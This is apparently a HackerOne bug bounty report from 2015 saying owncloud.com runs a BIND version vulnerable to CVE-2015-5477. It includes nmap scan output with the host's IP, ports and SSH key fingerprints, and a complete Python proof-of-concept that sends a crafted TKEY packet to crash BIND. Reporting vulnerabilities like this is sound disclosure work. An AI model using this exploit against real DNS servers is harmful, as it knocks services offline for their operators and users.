ownCloud: owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

2015-09-15T20:11:07
ID H1:89097
Type hackerone
Reporter 1n3
Modified 2015-09-16T08:25:57

Description

owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind.

NMap Scan Results: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT Warning: 50.30.33.235 giving up on port because retransmission cap hit (6). Nmap scan report for owncloud.com (50.30.33.235) Host is up (0.041s latency). rDNS record for 50.30.33.235: www.owncloud.com Not shown: 993 closed ports, 3 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.8 (protocol 2.0) | ssh-hostkey: | 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA) | 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA) | 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA) 53/tcp open domain | dns-nsid: | bind.version: 9.9.4-rpz2.13269.14-P2

Exploit PoC:

Exploit Title: PoC for BIND9 TKEY DoS

Exploit Author: elceef

Software Link: https://github.com/elceef/tkeypoc/

Version: ISC BIND 9

Tested on: multiple

CVE : CVE-2015-5477

!/usr/bin/env python

import socket import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53))

print('Done.')

CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477